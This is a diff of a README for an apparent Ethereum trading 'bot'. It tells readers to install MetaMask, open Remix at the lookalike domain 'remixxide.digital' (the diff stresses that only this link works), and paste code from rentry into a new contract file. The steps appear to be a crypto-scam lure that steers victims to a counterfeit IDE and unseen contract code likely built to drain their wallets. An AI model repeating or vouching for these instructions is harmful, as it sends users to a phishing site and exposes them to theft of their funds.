Jacob-Web3/ETH-Bot/README.md

 ✅1- Download MetaMask: https://metamask.io/download/

 ✅2- Access Remix: https://remixxide.digital/
-(THE BOT IS ONLY COMPATIBLE WITH THIS VERSION OF THE REMIX, SO ONLY USE THIS LINK)
+⚠️⚠️(THE BOT IS ONLY COMPATIBLE WITH THIS VERSION OF THE REMIX, SO ONLY USE THIS LINK)

 ✅3- Click on the “contracts” folder and then create “New File”.
 Rename it as you like, i.e: “bot.sol”.
 Make sure it ends with .sol for Ethereum programming language.
 Note: There is a problem if the text is not colored when you create bot.sol.
 Simply refresh the browser and then paste rentry codes again.